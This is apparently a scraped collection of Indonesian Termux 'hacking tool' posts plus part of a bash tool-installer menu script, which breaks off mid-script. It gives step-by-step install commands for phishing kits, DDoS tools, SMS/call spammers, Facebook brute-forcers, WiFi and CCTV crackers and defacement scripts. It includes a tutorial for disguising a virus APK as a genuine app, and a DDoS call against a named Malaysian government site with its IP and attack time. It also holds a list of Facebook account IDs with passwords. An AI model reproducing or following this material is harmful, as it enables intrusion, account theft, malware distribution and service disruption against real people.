https://github.com/InYourG00D1/PulsaFree $ ls $ cd PulsaFree $ sh Free.sh ÷Tools Sc Phising All Game÷ Tapi gk semua game juga si :V $ apt update && apt upgrade $ apt install figlet $ apt install toilet $ gem install lolcat $ pkg install git $ git clone https://github.com/InYourG00D1/ScPh1s1ng $ cd ScPh1s1ng $ sh 6.sh ÷Kumpulan shell & sc pepes÷ Kalo Ingin Direcode scnya silahkan Hak cipta Jangan Dirubah Hargai mereka coding gan Ngecoding Gk Segampang Dapettin Cinta Kamu $ pkg install update && pkg install upgrade $ apt install figlet $ apt install toilet $ gem install lolcat $ pkg install git $ git clone https://github.com/InYourG00D1/Pepescers $ cd Pepescers $ sh MTD.sh ÷Tools ngubah Vidmax jadi Flash÷ Work 100% dicoba aja gan $ pkg install update $ pkg install upgrade $ apt install php $ pkg install git $ git clone https://github.com/InYourG00D1/Flash $ cd Flash $ php flash.php ÷Tools Nuyul GoPay÷ $ pkg install update $ pkg install upgrade $ apt install php $ pkg install git $ git clone https://github.com/InYourG00D1/Nuyul-GoPay $ cd Nuyul-GoPay $ php Go-Pay.php ÷Tools Install Bkp÷ Yg punya Kontol BuKan Lu doang Bwahaha Proses Install nya lumayan lama :V Kalo Mau Cepet Cari Ea Sono $ apt update && apt upgrade $ apt install figlet $ apt install toilet $ gem install lolcat $ pkg install git $ git clone https://github.com/TumbalGanss/ToolsBkp $ cd ToolsBkp $ sh Tobat.sh ÷Tools Installer÷ 200 tools $ apt update && apt upgrade $ apt install figlet $ apt install toilet $ gem install lolcat $ pkg install git $ git clone https://github.com/InYourG00D1/InstallPlerN2 $ cd InstallPlerN2 $ sh InstallPlerV2.sh ÷Tools Script Phising All÷ game,FB,Instagram $ apt update && apt upgrade $ apt install figlet $ apt install toilet $ gem install lolcat $ pkg install git $ git clone https://github.com/InYourG00D1/scPH1S1N9 $ cd scPH1S1N9 $ sh PhisingV2.sh #shareMhank #nomor Yg ada Di Tools Udh Gk Aktif #Ini New Nomer nya : 0895805133060 https://chat.whatsapp.com/Cj0VpOmWpQBJUEQZqqOLn3 [+] Site Title: MyGOV - The Government of Malaysia's Official Portal [+] IP address: 150.242.182.57 [+] Web Server: Apache [+] CMS: Could Not Detect [+] Cloudflare: Not Detected [+] Robots File: Could NOT Find robots.txt! TARGET IP=150.242.182.57 PORT:80 TARGET WEB=malaysia.gov.my HARI INI 16-APRIL-2019 JAM 15.00 WIB TOOL ATTACK? -=NEW TOOL=- ================= Win32 attack ================= apt install git apt install python apt install bash apt install toilet apt install lolcat git clone https://github.com/BPCATTACKER/DOS-TOOKITS cd DOS-TOOKITS sh DoS-TOOKIT.sh APA YG BARU? -PERBAIKAN ERROR SAAT MENGIRIM PACKET ATTACK -DLL ================ DDOS BPC http://github.com/BLACK-PHANTOM-CYBER/DDOS-BPC/ cd DDOS-BPC python2 SPOONDDOS.sh =================== Ingat sebelum attack harus cek ip dulu karena ip bisa berubah-ubah Dgn cara Ketik di termux ping malaysia.gov.my Salam NASIONAL CYBER ASOSSIATION LEBIH BAIK MENCOBA DAN GAGAL DARI PD TIDAK MENCOBA SAMA SEKALI YG SEBAR GW DOAIN DAPAT PAHALA DAPAT PAHALA Spam Call Unlimited $ pkg update && pkg upgrade $ pkg install php $ pkg install git $ git clone https://github.com/Aditya021/SpamCall $ cd SpamSms $ php SpamCall.php Masukan No Target ===> Mode Banyak (y/n) ===> UNTUK Spam Lebih Dari 1 JumlahSpam ===> Masukan Jumlah yang ingin dispam🙏🙏🙏🎭🎭🇲🇨 Siapa tau ada yang mau nih sc Cara install tool Mr.Rv1.1 $apt update && apt upgrade $pkg install git $pkg install gem $pkg install figlet $gem install lolcat $git clone https://github.com/Mr-R225/Mr.Rv1.1 $cd Mr.Rv1.1 $sh Mr.Rv1.1.sh tool install $ apt update && apt upgrade $ apt install git $ git clone https://github.com/aryanrtm/4wsectools cd 4wsectools chmod 777 tools ./tools TOOL FSOCIETY $ git clone https://github.com/manisso/fsociety $ cd fsociety $ ./install.sh $ ls $ python2 fsociety.py Assalamualaikum wr.wb Ni gw bagi SC DARK-FB(VIP-VPRO) & Gw bagi2 akun FB untuk kalian Ni scripst HACK FB NEWW (VIP.VPRO) NO LISENSI ∞∞∞≠BY MR.M4RCH3LL≠∞∞∞ $ pkg update && pkg upgrade $ pkg install git $ pkg install python2 $ pkg install mechanize $ pkg install request $ git clone https://github.com/m4rche3ll-cyber/dark-vpro $ cd dark-vpro $ python2 dark-vpro.py NI akun FB untuk kalian smua [OK✓] 100037694627558 | Syla12345 [✓] 100037988325303 | Feri123 [✓] 100037977879771 | Rifaa123 [OK✓] 100037091885666 | Sutris12345 [OK✓] 100037229983265 | Kahfi123 [OK✓] 100037166443432 | Munir123 [OK✓] 100037216997895 Nawawi123 [OK✓] 100037665398302 | Ponatim123 [OK✓] 100037974392506 | Andri123 [OK✓] 100037679447951 | Andika123 [✓] 100037946790741 | Sutres123 [✓] 100038002561349 | Aghni123 [✓] 100038113410131 | Blaster123 [✓] 100037710525968 | Noffal123 [✓] 100037988325303 | Feri123 [✓] 100037590739244 | Agus123 [✓] 100037576672206 | Kenyot123 [✓] 100037974392506 | Andri123 [OK✓] 100037714800465 | Dafa123 [OK✓] 100037869518631 | Ervan123 [OK✓] 100037354215333 Tans12345 [OK✓] 100037553282746 | Rifal123 [OK✓] 100037114456712 | Afif12345 [OK✓] 100037388647024 | Doni123 OK✓] 100037155800753 | Ikna123 [OK✓] 100037360233177 | Udin123 [OK✓] 100037089379481 | Dafa123 [OK✓] 100037388887005 Ridwan123 OK✓] 100037199269083 | Rifki123 [OK✓] 100037446305432 | Bima123 Gunakan dengan bijak !!! Kalau kalian ingin tanya lebih / ada masalah Kalian bisa wa saya No wa ADA DI SC NYA/ komen di bawah Jangan lupa SUBSCRIBE (FREE) ,agar channel ini berkembang ,,& juga we akan membuat sc2 yang bermanfaat bagi kalian semua Link grup wa : https://chat.whatsapp.com/KxTHh6xi9OgEEl41UDURE9 Oke , terimakasih:) Wassalamu'alaikum wr.wb Aldaynoobz Selasa, 23 April 2019 Script-Termux We are anonymous We are legion We do not forgive We do not forget Expect us  DDOS ATTACK (TROJAN) $ apt install git $ apt install python $ apt install bash $ apt install toilet $ apt install lolcat $ git clone https://github.com/BPCATTACKER/DOS-TOOKITS $ cd DOS-TOOKITS $ sh DoS-TOOKIT.sh pilih no 1 lalu enter, lalu masukkan ip target dan enter attack sedang berjalan! DDOS ATTACK $ pkg update $ pkg upgrade $ pkg install python $ pkg install git $ git clone https://github.com/cyweb/ hammer $ cd hammer $ python hammer.py $ python3 hammer.py -s(ipnya cari sendiri di IP CHACKER) -p 80 -t 135 BOBOL-WIFI( root) $ apt update && apt upgrade $ pkg install git $ git clone https://github.com/esc0rtd3w/wifi-hacker $ cd wifi-hacker/ $ chmod +x wifi-hacker.sh $ ./wifi-hacker.sh HACK CCTV $ pkg update $ pkg upgrade -y $ pkg install python2 $ pkg install git $ git clone https://github.com/GUNAWAN18ID/cctv.git $ pip2 install requests $ cd cctv $ python2 scanner.py SPAM CALL $ pkg update $ pkg upgrade $ pkg install git $ pkg install python2 $ git clone https://github.com/MRRUXHANTAC270/RUXH4N_SPAM $ cd RUXH4N_SPAM $ python2 RUXH4N_SP4M.py8 Pilih nomor target jangan lupa pake (+62) ===>> +6285xxxxx Pilih jumlah spam ====>>>misal:100 Done :v DEFACE WEBDAV $ pkg update && pkg upgrade $ pkg install bash $ pkg install git $ pip2 install termocolor $ pip2 install lolcat $ git clone https://github.com/MRRUXHANTAC270/Deface-W3BD4F $ cd Deface-W3BD4F $ sh Webdav.sh Masukan script html Lalu pilih web vulnya >:) Cek 👇🏻👇🏻👇🏻 $apt install python2 $apt install git $apt install php $apt install bash $apt install nano $apt install toilet $git clone https://github.com/MRRUXHANTAC270/cek $cd cek $ls $sh cek.sh HACK FACEBOOK TARGET $pkg update && pkg upgrade $pkg install python2 $pkg install git $git clone https://github.com/MRRUXHANTAC270/Facebook-target $cd Facebook-target $python2 fb.py SILAHKAN DOWNLOAD WORD LIST NYA TERLEBIH DAHULU https://sfile.mobi/4UugtYlifYk Masukin id target ... Lalu klik /sdcard/password.txt SCRIPT DEFACE $apt update && apt upgrade $apt install python2 $apt install git $apt install php $apt install bash $apt install nano $apt install toilet $git clone https://github.com/MRRUXHANTAC270/scriptdeface $ cd scriptdeface $ python2 now.py SPAM WHATSAPP $ apt update && apt upgrade $ apt install python2 $ apt install git $ apt install php $ apt install bash $ git clone https://github.com/MRRUXHANTAC270/sp4m $ cd sp4m $ php wa.php Memper Cantik/Melihat V.Android Termux $ pkg update && pkg upgrade $ pkg install ruby cowsay toilet figlet $ pkg install neofetch $ pkg install nano $ gem install lolcat $ cd ../usr/etc $ nano bash.bashrc cowsay -f eyes Cyber | lolcat toilet -f standard Indonesia -F gay neofetch date | lolcat ✓ Hack FB rombongan $ apt update && apt upgrade $ pkg install python2 git $ pip2 install mechanize $ git clone http://github.com/pirmansx/mbf $ ls $ cd mbf $ python2 MBF.py ✓ Hack FB ngincer $ apt update ( Enter ) $ apt upgrade ( Enter ) $ apt install python2 ( Enter ) $ pip2 install urllib3 chardet certifi idna requests ( Enter ) $ apt install openssl curl ( Enter ) $ pkg install libcurl ( Enter ) $ ln /sdcard ( Enter ) $ cd /sdcard ( Enter ) $ python2 fbbrute.py ( Enter ) ✓ Hack Gmail $ apt-get update && apt-get upgrade $ apt-get install git $ apt-get install python python-pip python-setuptools $ pip install scapy $ git clone https://github.com/wifiphisher/wifiphisher.git $ cd wifiphisher< $ python setup.py install $ cd wifiphisher $ python wifiphisher Nih yang mau hack WiFi Khusus root $apt update $apt upgrade $apt install git $git clone https://github.com/esc0rtd3w/wifi-hacker $ls $cd wifi-hacker $ls $chmod +x wifi-hacker.sh $ls $./wifi-hacker.sh cara uninstall tool termux rm -rf toolsnya Bermain moon-buggy $ pkg install moon-buggy $ moon-buggy CHATTING VIA TERMUX irssi /connet irc.freenode.net /nick w3wandroid /join #modol $ pkg install irssi $ irssi $ /connect chat.freenode.net $ /nick 1235 12345 di ganti sesuai nama/nick agan $ /join #XCAteam PERKIRAAN cuaca curl http://wttr.in/ (lokasi) Browsing di termux $ pkg install w3m $ w3m www.google.com Linknya bsa diubah Telephone di termux $ pkg install termux-api $ termux-telephony-call nomornya Menampilkan animasi kereta :v $ pkg install sl $ sl menampilkan ikon dan informasi sistem android $ pkg install neofetch $ neofetch menampilkan teks dalam format ASCII $ pkg install figlet $ figlet masukin teksnya MEMUTAR MUSIC DI YOUTUBE VIA TERMUX $ pip install mps_youtube $ pip install youtube_dl $ apt install mpv $ mpsyt $ /judul lagu Tinggal pilih lagu dengan mengetik nomornya musikan di termux $ pkg install mpv $ mpv/sdcard/lagu.mp3 /sdcard/ bisa di ganti sesuai letak music CRACK PASSWORD HASH $ git clone https://github.com/FajriHidayat088/FHX-Hash-Killer/ $ cd FHX-Hash-Killer $ python2 FHXHashKiller.py $ git clone https://github.com/UltimateHackers/Hash-Buster $ cd Hash-Buster $ python2 hash.py ASCII ART MAPS - pkg install update && upgrade - pkg install perl - git clone https://github.com/x-xsystm/maps.git - cd kaos - perl maps.pl - untuk Zoom tekan A - Password: (pejuang212) CARA MENGHIAS TAMPILAN TERMUX $ pkg update && pkg upgrade $ pkg install ruby cowsay toilet figlet $ pkg install neofetch $ pkg install nano $ pkg install ncurses-utils $ pkg install ruby $ pkg install lolcat $ pkg install cowsay $ gem install lolcat $ nano .bashrc clear blue='\e[1;34m' green='\e[1;32m' purple='\e[1;35m' cyan='\e[1;36m' red='\e[1;31m' white='\e[1;37m' yellow='\e[1;33m' NOW=`date "+%d.%m.%Y"` TIME=`date "+%H:%M"` cowsay -f eyes *Welcome To MRCX hacking tool* | lolcat toilet -f standard " *MRCX* " -F gay neofetch echo " Time : " $TIME | lolcat date | lolcat echo echo Username : marcyber team | lolcat echo Hostname : @MRCX~#root_system | lolcat echo echo @localhost:~# | lolcat echo root@localhost:~$ | lolcat echo -e $green echo root@MRCX:~$ TUTORIAL MEMBUAT VIRUS SEPERTI APLIKASI ASLINYA Tools yang dibutuhkan: APK Editor & tool vbug APK Editor bisa didownload di playstore Tool vbug https://www.mediafire.com/file/6hs6y71ryw10uvw/vbug.zip 1. Download tool vbugnya dulu 2. Taruh file tool vbug di luar folder pada memori internal 3. Buka termux lalu $ cd /sdcard 4. $ unzip vbug.zip 5. $ cd vbug 6. $ python2 vbug.py 7. Enter 8. Ketik 10 9. Ketik E 10. Aplikasi virusnya sudah jadi Setelah aplikasinya jad kita tinggal edit supaya mirip aslinya 1. Buka APK Editor 2. Klik Select an Apk File 3. Pilih aplikasi virus tadi 4. Klik full edit 5. Pada bagian kolom app_name tulis nama aplikasi yang kalian inginkan 6. Lalu klik files 7. Klik res/drawable 8. Logo yang kedua itu ganti dengan logo aplikasi yang kalian inginkan Catatan: format logo harus .png 9. Ceklist logo yang kedua lalu replace 10. Pilih file logo yang mau dijadikan logo aplikasi agan 11. Back sampai home Supaya aplikasi terlihat lebih nyata kita harus beri bobot pada aplikasi buatan kita 12. Klik tanda plus yang ada di bawah kiri, pilih file, lagu, gambar atau apapun yang coxok sebagai bobot apliaksi agan 13. Klik build 14. Tunggu hingga selesai 15. Jadi deh VBugMaker Termux -apt update && apt upgrade -apt install git -apt install python Donwload file ->http://upfile.mobi/YGwg8gQLuvv Pindah ke directory Next -unzip vbug.zip -mv vbug $HOME -cd vbug -ls -chmod +x vbug.py -python2 vbug.py #Done BOOM SPAM DI TERMUX apt upgrade && apt update apt install git git clone https://github.com/Amriez/gcospam cd gcospam sh install.sh sh gco.sh Pilih nomer yang mana ajjh Lalu Masukan nomer tanpa 0/62 Input bebas Jeda default aja Spam bom mall $ pkg install update $ pkg install upgrade $ pkg install wget $ pkg install php $ wget http://files-store.theprivat.ml/uploads/bom-mall.zip $ unzip bom-mall.zip $ cd bom-mall $ php run.php (Install SpamTsel) $ pkg install curl $ pkg install php $ curl -s http://files-store.theprivat.ml/uploads/bombtsel.txt > bombtsel.php $ chmod 777 bombtsel.php $ php bombtsel.php 3) Tool Spam LITESPAM $ pkg install php $ pkg install toilet $ pkg install sh LITESPAM $ pkg install git $ git clone https://github.com/4L13199/LITESPAM $ cd LITESPAM $ sh LITESPAM.sh atau bash LITESPAM.sh Masukan Nomer nya... Spammer GRAB $pkg install python2 $pip2 install requests $pkg install git $git clone http://github.com/p4kl0nc4t/Spammer-Grab $cd Spammer-Grab $python2 spammer.py nomor hp korban --delay 30 spam sms jdid 1.PKG install PHP 2.pkg install cURL 3.curl https://pastebin.com/raw/9BYy1 JVc -o jdid.php 4.php jdid.php Hacking spammer by seni $apt update && apt upgrade $apt install python2 php $pip2 install requests $apt install nano $apt install git $git clone https://github.com/Senitopeng/ SpamSms.git $cd SpamSms $python2 mantan.py HACKING DAN TRICK FB VIA TERMUX AUTO BOOT FACEBOOK $ git clone https://github.com/Senitopeng/BotFbBangDjon.git $ cd BotFbBangDjon $ python2 bangdjon.py Cara crack id fb https://findmyfbid.in/ git clone https://github.com/tomiashari/fb-autoreaction.git cd fb-autoreaction python2 fb-autoreaction HACKING THOOLS MBF FACEBOOK $ pkg update && upgrade ‬$ pkg update && upgrade $ pkg install python2 $ pkg install git $ git clone https://github.com/pirmansx/mbf $ cd mbf $ python2 MBF.py (HACKING FB LEWAT TERMUX) $ apt update $ apt upgrade $ apt install python2 $ apt install python2-dev $ apt install wget $ dip2 install mechanize $ cd/sterage/emulated/0 $ python2 fbbrute.py ( yg tdi di download di tunda di luar folder ) Mungkin itu saja yang dapat saya bagikan, jika ada yang salah saya mohon maaf. Ingin Ikut Team Kami ? Klik Disini Website Team ? Klik Disini Website Umum ? Klik Disini Di Atas Langit Masih Ada Langit Jadi, Jangan Sok Berkuasa Belum Tentu Anda Lebih Baik Dari Kami #WeDoNotForget #WeDoNotForgive #ExpectUs Landy22 Salam Hangat,

    From user landy22granatt

  • mandoasd / installbucin-

    facebook-github-bot, ¶¶ InstallBucin /20-Tools #TermuxToolx #Tool #installer $pkg update $pkg upgrade $pkg install git git clone https://github.com/MrGameOver16/InstallBucin cd InstallBucin $sh bucin.sh ---------------------------------------------------------------------- ¶¶ Tools ¶¶ type 00 and install packages needed 1)DARK-FB v1.6 DARK-FB v1.7 2)BRUTEFORCE FB MBF 3)FBBRUTE FB PHP 4)BRUTEFORCE FB ( root ) 5)FB-CRACK-v.3 6)REPORT FACEBOOK WORK 7)AUTO REACTION FACEBOOK 8)INFORMATION FACEBOOK 9)AUTOLIKE FACEBOOK 10)PHISING 11)BLACKEYE 12)HACK CCTV PUBLIK 13)SADAP KAMERA 14)METASPLOIT 15)CHAT IRSSI 16)DDOS ATTACK 17)LITEDDOS 18)BUAT VIRUS 19)BOT INSTAGRAM ---------------------------------------------------------------------- ● 00 ● INSTALL BAHAN DULU BREW ● 0 ● EXIT PROGRAM

    From user mandoasd

  • mgz-staze / tools-termux

    facebook-github-bot, Cara Update dan Upgrade Termux pkg update && pkg upgrade Tools Pendukung untuk Termux Tools pendukung yang di perlukan agar tools yang lain work. <—-| PENTING pkg install git php curl -y pkg install python2 pkg install apache2 Trik Termux Untuk mematikan atau memberhentikan tools tekan tombol volume bawah (-) + C secara bersamaan Untuk memunculkan commands sebelumnya tekan tombol volume bawah + P Menampilkan Tombol ESC, HOME, CTRL dan lainnya Tekan Tombol volume atas + Q script termux Menampilkan Matrix  Ini cuma menampilkan angka dan huruf berjatuhan, terlihat keren •pkg install cmatrix cmatrix mempercantik termux Note : Jika ada pertanyaan saat install, silahkan ketik tombol y lalu enter saja, agar proses install dapat berjalan dengan lancar. Ratusan Tools Termux Sebagian dari Kali Linux •pkg install git •git clone https://github.com/Mrcakil/mrcakil •cd mrcakil •chmod +x tools •./tools ratusan tools termux Bermain atau Memunculkan Kereta Api pkg install sl sl main termux Bot Auto Reaction Facebook •git clone https://github.com/AMVengeance/FB-React.git •chmod +x FB-React -R cd FB-React •./start fb react Bot Love Instagram •git clone https://github.com/indogram/indotagram.git  •php indotagram/login.php  Masukkan username dan password instagram untuk memunculkan cookie Kemudian copy dan paste kode cookie ke website penyedia bot instagram disini bot instagram NIK dan KK Gratis •pkg install php git •git clone https://github.com/IndonesiaSecurity/kkktp •cd kkktp php •kkktp.php Menjalankan Musik di Termux pkg install mpv mpv /lokasi/musik/musik.mp3 cara memutar musik di termux Menampilkan Informasi System pkg install neofetch neofetch tampilan informasi Membuat Tulisan atau Teks Besar di Termux pkg install figlet figlet initulisannya cara membuat tulisan nesar di termux Crack hash password git clone https://github.com/FajriHidayat088/FHX-Hash-Killer/ cd FHX-Hash-Killer python2 FHXHashKiller.py Cara Menginstall Metasploit di Termux Metasploit adalah tools hacking yang dapat di gunakan untuk kegiatan seperti remote pc atau hp orang lain, membuat virus, menyadap dan lain sebagainya. Cara Install dan Menjalankannya pkg install curl curl -LO https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh chmod +x metasploit.sh ./metasploit.sh Cara Install Wifite di Termux Android Wifite adalah salah satu tool yang berfungsi untuk wireless attack, seperti mengcrack atau membobol password wifi yang terkunci dengan wpa/wpa2, Cara Install Wifite git clone https://github.com/derv82/wifite cd wifite chmod 777 wifite.py Cara Menjalankan Wifite python2 wifite.py Bruteforce  Bruteforce ini metode hacking yang dimana kita akan membuat suatu wordlist yang berisi kumpulan tebakan password, jika ada salah satu password yang sesuai maka akun bisa di dapatkan. pkg install pip pip install wordlist pkg install worlist wordlist -h cd /sdcard cat pas.txt Redhawk Fitur Redhawk Server detection Cloudflare detector robots scanner Whois GEO-IP Scan NMAP Port Scan DNS Lookup SubNet Calculator Subdomain Finder Reverse IP Scanner CMS detection For Sites On the same server. Parameter Finder Error based SQLi Detector Dan lain – lain. Cara install dan menjalankan Redhawk git clone https://github.com/Tuhinshubhra/RED_HAWK cd RED_HAWK chmod +x rhawk.php php rhawk.php Install SQLMAP Tools ini berguna sekali untuk kegiatan mengetes keamanan website, deface, carding dan semacamnya gi clone https://github.com/sqlmapproject/sqlmap cd sqlmap python2 sqlmap.py Cara menjalankan python2 sqlmap.py -u website.com --dbs Mengetahui semua parameter Sqlmap python2 sqlmap.py -hh Melacak IP git clone https://github.com/maldevel/IPGeolocation cd IPGeolocation chmod +x ipgeolocation.py pip install -r requirements.txt python ipgeolocation.py -m python ipgeolocation.py -t IPnya Hack Akun Facebook •pkg install python2-dev •apt install wget dip2 •install mechanize •cd/sterage/emulated/0 python2 fbbrute.py •storage/emulated/0/password.txt Membuat Virus git clone https://github.com/viruz09/CreaterVirus cd CreaterVirus python2 creater.py Cara copy virus cp agents.apk /lokasi/folder DDOS DDOS berguna untuk menyerang website dengan memberikan traffic yang tinggi sehingga website tersebut down. git clone https://github.com/4L13199/LITEDDOS python2 LITEDDOS.py [ip target atau domain] [port] [jumlah traffic] Cara Install Santet Online Di Termux  Fitur Create a Netcat Payload and Listener Facebook Group Hijack Attack SMS Bomber Attack Vectors SMS Spoof Attack Vectors Denial-of-Service Attack •git clone https://github.com/Gameye98/santet-online •cd santet-online •python2 santet.py Tools B4J1N94N Fitur Nyari CC buat carding Spam akun gmail Whois lookup Dan ratusan tools lainnya •git clone https://github.com/DarknessCyberTeam/B4J1N64Nv5 •cd B4J1N64Nv5 •sh B4J1N64N.sh

    From user mgz-staze

  • mrastra96 / mytools

    facebook-github-bot, #TOOL INSTALLER V.1.0 #CODED BY : Mr.Astra96 #CODENAME : DheMell bi='\033[34;1m' #biru ij='\033[32;1m' #ijo pr='\033[35;1m' #purple cy='\033[36;1m' #cyan me='\033[31;1m' #merah pu='\033[37;1m' #putih ku='\033[33;1m' #kuning or='\033[1;38;5;208m' #Orange echo "-----------------------------------------------------------" toilet -f pagga " Kalsel{Z}Tool"|lolcat echo "-----------------------------------------------------------" echo $ij"[+]─────────────────────────────────────────────────────[+]" echo $ij" | •••••••••• |Kalsel[E]Xploit| •••••••••••• |" echo $ij" | ───────────────────────────────────────────────────── |" echo $ij" | VERSION TOOL: INSTALLER V.1.0 |" echo $ij" | Author : Mr.Astra |" echo $ij" | CodeName : IY×TraCode |" echo $ij" | Instagram : mr_astra96 |" echo $ij" | Telegram : htttps://t.me/RabbitCL4Y |" echo $ij" | Github : https://github.com/RabbitCL4Y |" echo $ij" | Thanks To : •Santri Pasuruan• |" echo $ij" | COPYRIGHT : 2K19 Kalsel[E]Xploit |" echo $ij"[+]─────────────────────────────────────────────────────[+]" echo echo $pu"───────────────────────────────────────────" echo $or"[00]" $pu"About" $ku"Tool" $ij"Program" echo $pu"───────────────────────────────────────────" echo $pu"───────────────────────────────────────────" echo $me" Kalsel[E]Xploit×Tool" echo $pu"───────────────────────────────────────────" echo $cy"[01]" $ku"SPAM-CALL |" echo $cy"[02]" $pu"Yt-Downloader |" echo $cy"[03]" $me"DORK-SCANNER |" echo $cy"[04]" $pr"REV-IP |" echo $cy"[05]" $ij"CHECK-IP |" echo $cy"[06]" $bi"INSTAHACK |" echo $cy"[07]" $or"AdminFinder |" echo $cy"[08]" $ku"DDoS |" echo $cy"[09]" $pu"MD5-CRACKER |" echo $cy"[10]" $me"CAPING-BOT |" echo $cy"[11]" $pr"MAIL-SPAMMER |" echo $cy"[12]" $ij"Im3-Spammer |" echo $cy"[13]" $bi"Create-Bot-SSH |" echo $cy"[14]" $or"ghoul |" echo $cy"[15]" $ku"SQLI-Vuln-Checker |" echo $cy"[16]" $pu"Wp-Scan |" echo $cy"[17]" $me"NAS |" echo $cy"[18]" $pr"Mp4-Convert |" echo $cy"[19]" $ij"Exploit-LokoMedia |" echo $cy"[20]" $bi"DDoS-With-Perl |" echo $cy"[21]" $or"ApkPure-Downloader |" echo $cy"[22]" $ku"GitHub-Info |" echo $cy"[23]" $pu"Proxy-Checker |" echo $cy"[24]" $me"PenKEX [Penetration Testing] |" echo $cy"[25]" $pr"Ysub-Checker |" echo $cy"[26]" $ij"Text-To-Hex |" echo $cy"[27]" $bi"Apk-Webdav (By :Kalsel[E]Xploit) |" echo $cy"[28]" $or"Pentester |" echo $cy"[29]" $ku"ASWPLOIT |" echo $cy"[30]" $pu"InFoGa {Information-Gathering} |" echo $pu"───────────────────────────────────────────" echo $me" ZseCc0de-Crew.ID×Tool" echo $pu"───────────────────────────────────────────" echo $cy"[31]" $ku"ParrotSec |" echo $cy"[32]" $pu"GrabGithub |" echo $cy"[33]" $me"SubFinder |" echo $cy"[34]" $pr"RoliSpam |" echo $cy"[35]" $ij"Mail-Filter |" echo $cy"[36]" $bi"AdminScan |" echo $cy"[37]" $or"IPinfo |" echo $cy"[38]" $ku"CardGen |" echo $cy"[39]" $pu"CardValidator |" echo $cy"[40]" $me"BlogGrab |" echo $cy"[41]" $pr"IgStalker |" echo $cy"[42]" $ij"GpsTrack |" echo $cy"[43]" $bi"UrlDecode |" echo $cy"[44]" $or"Checker |" echo $cy"[45]" $ku"FbBot |" echo $cy"[46]" $pu"YtSub |" echo $pu"───────────────────────────────────────────" echo $me" I.T.A×Tool" echo $pu"───────────────────────────────────────────" echo $cy"[47]" $ku"TOOLINSTALLERv1 |" echo $cy"[48]" $pu"TOOLINSTALLERv2 |" echo $cy"[49]" $me"TOOLINSTALLERv3 |" echo $cy"[50]" $pr"TOOLINSTALLERv4 |" echo $cy"[51]" $ij"DIR |" echo $cy"[52]" $bi"REVERSEIP |" echo $cy"[53]" $or"TRACKIP |" echo $cy"[54]" $ku"DNSLOOKUP |" echo $cy"[55]" $pu"WHOIS |" echo $cy"[56]" $me"REVESEDNS |" echo $cy"[57]" $pr"WEBDAV |" echo $cy"[58]" $ij"DIRHUNT |" echo $cy"[59]" $bi"SUBDO |" echo $cy"[60]" $or"HTTPHEADERS |" echo $cy"[61]" $ku"YOUTUBE-DOWNLOADER |" echo $cy"[62]" $pu"ADLOG (ADMIN LOGIN) |" echo $cy"[63]" $me"JADWAL-SHOLAT |" echo $cy"[64]" $pr"TOOLKIT |" echo $cy"[65]" $ij"BASH-ENCRYPT |" echo $cy"[66]" $bi"ENCRYPT-PYTHON |" echo $cy"[67]" $or"Facebook-BruteForce |" echo $cy"[68]" $ku"VULNSCANNING |" echo $cy"[69]" $pu"SHORTENERLINKS |" echo $cy"[70]" $me"PERKIRAANCUACA |" echo $cy"[71]" $pr"ARITMATIKA |" echo $pu"───────────────────────────────────────────" echo $me" Black Coder Crush×Tool" echo $pu"───────────────────────────────────────────" echo $cy"[72]" $ku"Shortlink |" echo $cy"[73]" $pu"404GitHub |" echo $cy"[74]" $me"X-Caping |" echo $cy"[75]" $pr"ScriptCreator |" echo $cy"[76]" $ij"LinkChatGen |" echo $cy"[77]" $bi"BulkMailSpam |" echo $cy"[78]" $or"BinCon |" echo $cy"[79]" $ku"DfvAscii |" echo $cy"[80]" $pu"DfvXploit |" echo $pu"───────────────────────────────────────────" echo $me" BlackWare Coders Team×Tool" echo $pu"───────────────────────────────────────────" echo $cy"[81]" $ku"Dorking |" echo $cy"[82]" $pu"Scanning |" echo $cy"[83]" $me"Reverse-Ip |" echo $cy"[84]" $pr"CBT-Vuln-Scanner |" echo $pu"───────────────────────────────────────────" echo $me" INSTALL BAHANNYA DULU GAN" echo $pu"───────────────────────────────────────────" echo $cy"[99]" $or"PILIH AKU SENPAI😍😍" echo $pu"───────────────────────────────────────────" echo $me"┌==="$bi"["$i"Mr.Astra code"$bi"]"$me"======"$bi"["$i""SELECT THE NUMBER""$bi"]" echo $me"¦" read -p"└──# " kaex if [ $kaex = 1 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/SPAM-CALL cd SPAM-CALL bash CaLL.sh fi if [ $kaex = 2 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/YOUTUBE-DOWNLOADER cd YOUTUBE-DOWNLOADER python2 youtube.py fi if [ $kaex = 3 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/DORK-SCANNER cd DORK-SCANNER php scan.php fi if [ $kaex = 4 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/REV-IP cd REV-IP python3 rev.io fi if [ $kaex = 5 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/CHECK-IP cd CHECK-IP python2 checkip.py fi if [ $kaex = 6 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/INSTAHACK cd INSTAHACK python2 insta.py fi if [ $kaex = 7 ] then clear figlet -f slant "[PLEASE WAIT"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/AdminFinder cd AdminFinder python2 admin.py fi if [ $kaex = 8 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/DDoS cd DDoS python2 ddos.py fi if [ $kaex = 9 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/MD5-CRACKER cd MD5-CRACKER python2 md5.py fi if [ $kaex = 10 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/CAPING-BOT cd CAPING-BOT php bot.php fi if [ $kaex = 11 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/MAIL-SPAMMER cd MAIL-SPAMMER php mail.php fi if [ $kaex = 12 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/Im3-Spammer cd Im3-Spammer php im3.php fi if [ $kaex = 13 ] then clear figlet -f slant 